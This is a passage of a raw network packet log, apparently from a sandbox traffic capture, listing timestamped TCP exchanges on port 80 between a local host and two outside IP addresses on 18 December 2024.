                                                                                                                                                              Dec 18, 2024 11:47:20.598342896 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.598370075 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.598385096 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.599368095 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.599410057 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.599487066 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.599519014 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.600541115 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.600596905 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.600627899 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.600708008 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.601787090 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.601830006 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.601864100 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.601897955 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.602876902 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.602922916 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.602931023 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.602966070 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.604049921 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.604094982 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.604156971 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.604278088 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.605310917 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.605360031 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.605376959 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.605393887 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.606383085 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.606429100 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.606509924 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.606545925 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.607598066 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.607647896 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.607680082 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.607717991 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.608994007 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.609041929 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.609057903 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.609098911 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.609925032 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.609978914 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.610011101 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.610053062 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.611054897 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.611105919 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.611217976 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.611258030 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.612231016 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.612281084 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.741826057 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.741884947 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.741990089 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.742033005 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.742491007 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.742532015 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.742669106 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.742714882 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.743716955 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.743767977 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.743773937 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.743817091 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.744831085 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.744874001 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.745033026 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.745085001 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.746011019 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.746057987 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.746088028 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.746129036 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.747070074 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.747112036 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.747277021 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.747366905 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.748351097 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.748403072 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.748565912 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.748614073 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.749401093 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.749454975 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.749675989 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.749722004 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.750626087 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.750670910 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.750760078 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.750806093 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.751758099 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.751805067 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.752957106 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.752969027 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.752981901 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.753002882 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.753043890 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.754106998 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.754158020 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.754304886 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.754359961 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.755285978 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.755336046 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.756014109 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.756062031 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.756447077 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.756495953 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.757179022 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.757225990 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.757600069 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.757641077 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.758809090 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.758822918 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.758836031 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.758852959 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.758869886 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.758891106 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.759922028 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.759965897 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.760226965 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.760278940 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.761101007 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.761156082 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.761231899 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.761284113 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.762342930 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.762387037 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.762774944 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.762820959 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.763478994 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.763490915 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.763524055 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.764657974 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.764709949 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.764727116 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.764774084 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.765769958 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.765813112 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.766011953 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.766057968 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.766967058 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.767023087 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.767582893 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.767640114 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.768126965 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.768172026 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:20.768487930 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:20.768599033 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:23.465554953 CET4979680192.168.2.6185.215.113.43
                                                                                                                                                              Dec 18, 2024 11:47:23.465858936 CET4983380192.168.2.6185.215.113.43
                                                                                                                                                              Dec 18, 2024 11:47:23.585529089 CET8049796185.215.113.43192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:23.585546017 CET8049833185.215.113.43192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:23.585587978 CET4979680192.168.2.6185.215.113.43
                                                                                                                                                              Dec 18, 2024 11:47:23.585635900 CET4983380192.168.2.6185.215.113.43
                                                                                                                                                              Dec 18, 2024 11:47:23.586057901 CET4983380192.168.2.6185.215.113.43
                                                                                                                                                              Dec 18, 2024 11:47:23.706013918 CET8049833185.215.113.43192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:25.561048031 CET8049833185.215.113.43192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:25.561619997 CET4983380192.168.2.6185.215.113.43
                                                                                                                                                              Dec 18, 2024 11:47:25.591770887 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:25.592122078 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:25.711606979 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:25.711678028 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:25.711774111 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:25.714257002 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:25.715697050 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:25.835267067 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.141222000 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.141249895 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.141292095 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.141305923 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.141340971 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.141340971 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.141354084 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.141391993 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.141437054 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.141449928 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.141489983 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.141562939 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.141573906 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.141585112 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.141606092 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.141618013 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.261195898 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.261210918 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.261257887 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.261286020 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.265266895 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.265307903 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.265345097 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.265381098 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.273818016 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.273912907 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.388487101 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.388503075 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.388513088 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.388573885 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.388622046 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.393740892 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.393815994 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.504890919 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.504964113 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.508646011 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.508660078 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.508677006 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.508699894 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.508744001 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.514091969 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.514141083 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.625088930 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.625142097 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.625159979 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.625176907 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.625178099 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.625252008 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.625318050 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.625353098 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.625385046 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.625387907 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.625400066 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.625422955 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.625473022 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.625474930 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.625509024 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.625544071 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.625576019 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.625576019 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.625576973 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.625611067 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.625646114 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.625649929 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.625726938 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.625751019 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.625788927 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.625824928 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.625855923 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.625976086 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.627526999 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.627563953 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.627593994 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.627598047 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.627610922 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.627633095 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.627666950 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.627677917 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.627701044 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.627706051 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.627736092 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.627765894 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.627772093 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.627774954 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.627821922 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.628078938 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.628115892 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.628145933 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.628206968 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.628294945 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.628354073 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.628463030 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.628515005 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.635624886 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.635682106 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.635705948 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.635726929 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.643176079 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.643239021 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.643299103 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.650576115 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.650615931 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.650638103 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.650661945 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.748090982 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.748157978 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.748222113 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.748267889 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.751492977 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.751606941 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.751741886 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.751890898 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.758743048 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.758799076 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.758800983 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.758935928 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.766041994 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.766107082 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.766238928 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.766338110 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.772223949 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.772267103 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.772295952 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.772321939 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.777892113 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.778043032 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.778145075 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.778187990 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.783699036 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.783744097 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.783776045 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.783813000 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.789594889 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.789608002 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.789648056 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.789660931 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.795145988 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.795193911 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.795218945 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.795257092 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.800903082 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.800992966 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.801024914 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.801024914 CET4983780192.168.2.631.41.244.11
